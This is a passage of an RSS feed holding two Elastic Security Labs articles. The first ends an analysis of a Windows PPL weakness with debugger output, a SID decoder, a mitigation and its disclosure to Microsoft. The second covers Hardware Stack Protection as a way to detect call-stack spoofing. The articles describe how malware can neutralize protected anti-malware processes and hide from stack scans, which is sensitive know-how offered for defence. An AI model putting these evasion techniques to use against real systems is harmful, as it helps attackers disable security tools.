(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]-&gt;KernelObject-&gt;Token-&gt;Object - sizeof(nt!_OBJECT_HEADER))  &amp; ~0xf))-&gt;SecurityDescriptor &amp; ~0xf) : 0xffffe00649c46c20
1: kd&gt; !sd 0xffffe00649c46c20
-&gt;Revision: 0x1
-&gt;Sbz1    : 0x0
-&gt;Control : 0x8814
            SE_DACL_PRESENT
            SE_SACL_PRESENT
            SE_SACL_AUTO_INHERITED
            SE_SELF_RELATIVE
-&gt;Owner   : S-1-5-32-544
-&gt;Group   : S-1-5-32-544
-&gt;Dacl    :
-&gt;Dacl    : -&gt;AclRevision: 0x2
-&gt;Dacl    : -&gt;Sbz1       : 0x0
-&gt;Dacl    : -&gt;AclSize    : 0x1c
-&gt;Dacl    : -&gt;AceCount   : 0x1
-&gt;Dacl    : -&gt;Sbz2       : 0x0
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceType: ACCESS_ALLOWED_ACE_TYPE
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceFlags: 0x0
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceSize: 0x14
-&gt;Dacl    : -&gt;Ace[0]: -&gt;Mask : 0x000f01ff
-&gt;Dacl    : -&gt;Ace[0]: -&gt;SID: S-1-5-18

-&gt;Sacl    :
-&gt;Sacl    : -&gt;AclRevision: 0x2
-&gt;Sacl    : -&gt;Sbz1       : 0x0
-&gt;Sacl    : -&gt;AclSize    : 0x34
-&gt;Sacl    : -&gt;AceCount   : 0x2
-&gt;Sacl    : -&gt;Sbz2       : 0x0
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceFlags: 0x0
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceSize: 0x14
-&gt;Sacl    : -&gt;Ace[0]: -&gt;Mask : 0x00000001
-&gt;Sacl    : -&gt;Ace[0]: -&gt;SID: S-1-16-16384

-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE
-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceFlags: 0x0
-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceSize: 0x18
-&gt;Sacl    : -&gt;Ace[1]: -&gt;Mask : 0x00020018
-&gt;Sacl    : -&gt;Ace[1]: -&gt;SID: S-1-19-1024-8192

</code></pre>
<p>The SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). That SID can be interpreted as follows:</p>
<ul>
<li>1: <a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L1794">Revision 1</a></li>
<li>19: <a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2097">SECURITY_PROCESS_TRUST_AUTHORITY</a></li>
<li>1024:
<a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2100">SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID</a></li>
<li>8192:
<a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2104">SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID</a></li>
</ul>
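<p>To make the SID and ACE mask concrete, here is a short Python sketch that decodes both. The parser is a hypothetical helper written for illustration (it is not part of any Windows API); the access-right constants are the standard winnt.h values.</p>

```python
# Decode the trust-label SID and ACE mask shown in the !sd output above.
# Constant names and values follow winnt.h.

READ_CONTROL       = 0x00020000
TOKEN_QUERY        = 0x00000008
TOKEN_QUERY_SOURCE = 0x00000010

def parse_trust_sid(sid: str):
    """Split a SID string like 'S-1-19-1024-8192' into
    (revision, identifier authority, sub-authorities)."""
    parts = sid.split("-")
    assert parts[0] == "S", "not a SID string"
    return int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]

rev, authority, (ptype, plevel) = parse_trust_sid("S-1-19-1024-8192")
assert authority == 19  # SECURITY_PROCESS_TRUST_AUTHORITY
assert ptype == 1024    # SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID
assert plevel == 8192   # SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID

# The trust-label ACE mask grants exactly these three rights:
assert READ_CONTROL | TOKEN_QUERY | TOKEN_QUERY_SOURCE == 0x00020018
```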
<h3>Mitigation</h3>
<p>Alongside this article, we are releasing an update to the <a href="https://github.com/elastic/PPLGuard">PPLGuard</a> proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. A video accompanying the original post shows it in action, protecting Defender.</p>
<h2>Disclosure</h2>
<p>We disclosed this vulnerability and proposed fixes to the <a href="https://www.microsoft.com/en-us/msrc?rtc=1">Microsoft Security Response Center</a> (MSRC) on 2022-01-05. They responded on 2022-01-24 that they had classified it as moderate severity and would not address it with a security update, though they may address it in a future version of Windows.</p>
<h2>Conclusion</h2>
<p>In this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/blog-thumb-tools-various.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Finding Truth in the Shadows]]></title>
            <link>https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows</link>
            <guid>finding-truth-in-the-shadows</guid>
            <pubDate>Thu, 26 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[Let's discuss three benefits that Hardware Stack Protections brings beyond the intended exploit mitigation capability, and explain some limitations.]]></description>
            <content:encoded><![CDATA[<p>Microsoft has begun rolling out user-mode <a href="https://techcommunity.microsoft.com/t5/windows-kernel-internals-blog/understanding-hardware-enforced-stack-protection/ba-p/1247815">Hardware Stack Protection</a> (HSP) starting in Windows 10 20H1. HSP is an exploit mitigation technology that prevents corruption of return addresses on the stack, a common component of <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">code reuse attacks</a> for software exploitation. Backed by silicon, HSP uses Intel's Control-flow Enforcement Technology (CET) and AMD's Shadow Stack, combined with software support <a href="https://windows-internals.com/cet-on-windows/">described in great detail</a> by Yarden Shafir and Alex Ionescu. Note that the terms HSP and CET are often used interchangeably.</p>
<p>HSP creates a shadow stack, separate from the regular stack. It is read-only in user mode, and consists exclusively of return addresses. Contrast this with the regular stack, which interleaves data with return addresses, and must be writable for applications to function correctly. Whenever a CALL instruction executes, the current instruction pointer (aka return address) is pushed onto both the regular and shadow stacks. Conversely, RET instructions pop the return address from both stacks, generating an exception if they mismatch. In theory, ROP attacks are mitigated because attackers can't write arbitrary values to the read-only shadow stack, and changing the Shadow Stack Pointer (SSP) is a privileged operation, making pivots impossible.</p>
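<p>The CALL/RET bookkeeping described above can be sketched as a toy model. This is purely illustrative Python; the real mechanism is enforced in hardware, and the fault raised on mismatch is a control-protection exception (#CP), not a software check.</p>

```python
class ShadowStackModel:
    """Toy model of shadow-stack semantics: CALL pushes the return
    address onto both stacks; RET pops both and faults on mismatch."""

    def __init__(self):
        self.stack = []   # regular stack: writable, interleaves data and return addresses
        self.shadow = []  # shadow stack: return addresses only, read-only in user mode

    def call(self, return_address):
        # CALL pushes the return address onto both stacks
        self.stack.append(return_address)
        self.shadow.append(return_address)

    def ret(self):
        # RET pops both stacks and compares the two copies
        ra, shadow_ra = self.stack.pop(), self.shadow.pop()
        if ra != shadow_ra:
            raise RuntimeError("control-protection fault: return address mismatch")
        return ra

m = ShadowStackModel()
m.call(0x1000)
m.call(0x2000)
m.stack[-1] = 0x41414141  # ROP-style overwrite of the writable regular stack...
try:
    m.ret()               # ...faults: the shadow copy still holds 0x2000
except RuntimeError as e:
    print(e)
```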
<p>Today we’re going to discuss three additional benefits that HSP brings, beyond the intended exploit mitigation capability, then go into some limitations.</p>
<h1>Debugging</h1>
<p>Although designed as an exploit mitigation, HSP provides useful data for other purposes. Modern versions of <a href="https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86?hl=en-us&amp;gl=us">WinDbg</a> will display a hint to the user that they can use SSP as an alternate way to recover a stack trace. This can be very useful when debugging stack corruption bugs that overwrite return addresses, because the shadow stack is independent. It's also useful in situations where the stack unwind data is unavailable.</p>
<p>For example, see the WinDbg output below for a process memory dump. The <code>k</code> command displays a regular stack trace. <code>dps @ssp</code> resolves all symbols it can find, starting at SSP - this is essentially a shadow stack trace. Note how the two stack traces are identical except for the first frame:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image3.png" alt="Note the similarities" /></p>
<h1>Performance</h1>
<p>Kernel mode components such as EDR and ETW often capture stack traces to provide additional context to each event. On x64 platforms, a stack walk entails capturing the thread’s context, then looking up a data structure for each frame that enables the walker to &quot;unwind&quot; it and find the next frame. These lookups were slow enough that Microsoft saw fit to construct a <a href="http://uninformed.org/index.cgi?v=8&amp;a=2&amp;p=20">multi-tier cache system</a> when they added x64 support. You can see the traverse/unwind process approximated <a href="https://github.com/reactos/reactos/blob/11a71418d50f48ff0e10d2dbbe243afaf34c4368/sdk/lib/rtl/amd64/unwind.c#L909C6-L1011">here</a> in ReactOS, sans cache.</p>
<p>Given that the entire shadow stack likely resides on a single page and no unwinding is required, shadow stack walking is probably more performant than traditional stack walking, though this has yet to be proven.</p>
<h1>Detection</h1>
<p>The shadow stack provides an interesting detection opportunity. Adversaries can use techniques demonstrated in <a href="https://github.com/mgeeky/ThreadStackSpoofer/tree/master">ThreadStackSpoofer</a> and <a href="https://github.com/WithSecureLabs/CallStackSpoofer">CallStackSpoofer</a> to obfuscate their presence against thread stack scans (e.g. <code>StackWalk64</code>) and inline stack traces like <a href="https://www.lares.com/blog/hunting-in-the-sysmon-call-trace/">Sysmon Open Process events</a>.</p>
<p>By comparing a traditional stack walk against its shadowy sibling, we can both detect and bypass thread stack spoofing. We present <a href="https://github.com/gabriellandau/ShadowStackWalk">ShadowStackWalk</a>, a PoC that implements CaptureStackBackTrace/StackWalk64 using the shadow stack to catch thread stack spoofing.</p>
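<p>The core of that comparison can be sketched in a few lines. This is illustrative Python with made-up return addresses; ShadowStackWalk itself reads the real regular and shadow stacks.</p>

```python
def diff_stacks(traditional, shadow):
    """Compare an unwind-based stack walk against the shadow stack.
    Frames present only in the shadow walk were hidden from the
    traditional walker; frames present only in the traditional walk
    do not correspond to real calls, i.e. they were forged."""
    trad_set, shadow_set = set(traditional), set(shadow)
    hidden = [f for f in shadow if f not in trad_set]
    forged = [f for f in traditional if f not in shadow_set]
    return hidden, forged

# Hypothetical return addresses: the spoofer truncated the real chain
# and substituted a benign-looking frame.
traditional = [0x7FF61000, 0x7FFB2000]              # what StackWalk64 reports
shadow      = [0x7FF61000, 0x7FFEDEAD, 0x7FFEBEEF]  # what the shadow stack recorded

hidden, forged = diff_stacks(traditional, shadow)
assert hidden == [0x7FFEDEAD, 0x7FFEBEEF]  # frames the spoofer concealed
assert forged == [0x7FFB2000]              # the substituted frame
```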
<p>When the stack is normal, ShadowStackWalk functions similarly to <code>CaptureStackBackTrace</code> and <code>StackWalk64</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image7.jpg" alt="ShadowStackWalk normal stack" /></p>
<p>ShadowStackWalk is unaffected by intentional breaks of the call stack such as <a href="https://github.com/mgeeky/ThreadStackSpoofer/blob/f67caea38a7acdb526eae3aac7c451a08edef6a9/ThreadStackSpoofer/main.cpp#L20-L25">ThreadStackSpoofer</a>. Frames missed by other techniques are in green:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image8.jpg" alt="ShadowStackWalk encounters a broken call stack" /></p>
<p>ShadowStackWalk doesn't care about forged stack frames. Incorrect frames are in red. Frames missed by other techniques are in green:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image9.jpg" alt="Forged stack frames? No Problem." /></p>
<h1>Limitations</h1>
<p>Hardware support for HSP is limited. HSP requires at least an 11th-gen Intel or 5000-series Ryzen CPU, both released in late 2020. There is no software emulation. It will take years for the majority of CPUs to support HSP.</p>
<p>Software support for HSP is limited. Microsoft has been slowly rolling it out, even among their own processes. On an example Windows 10 22H2 workstation, it's enabled in roughly 40% of processes. Because HSP is an exploit mitigation, implementation will likely start with common exploitation targets like web browsers, though not even all of the msedge.exe processes shown below are protected by it. As HSP matures and support improves, non-HSP processes will become outliers worthy of additional scrutiny, much like processes without DEP support are in 2023. For now, malware can simply choose to target processes without HSP enabled. Also of note: HSP does not support WOW64 at all.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image2.jpg" alt="Software support for HSP is limited, even among Microsoft's processes (in red). Contrasted (in blue) against mature technologies like DEP and ASLR" /></p>
<p>HSP was designed with an exploit mitigation threat model. It was never designed to defend against adversaries who already have code execution, can change thread contexts, and can perform system calls. In time, adversaries will adapt their call stack manipulations to tamper with the shadow stack as well. However, because the shadow stack is read-only from user mode and changing the SSP is a privileged operation, such tampering requires system calls, which can (theoretically) be subjected to far more scrutiny than traditional stack tampering.</p>
<h1>Conclusion</h1>
<p>Today we discussed three potential benefits of Windows Hardware Stack Protection, and released <a href="https://github.com/gabriellandau/ShadowStackWalk">a PoC</a> demonstrating how it can be used to both detect and defeat defense evasions that manipulate the call stack.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/blog-thumb-laser-tunnel.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>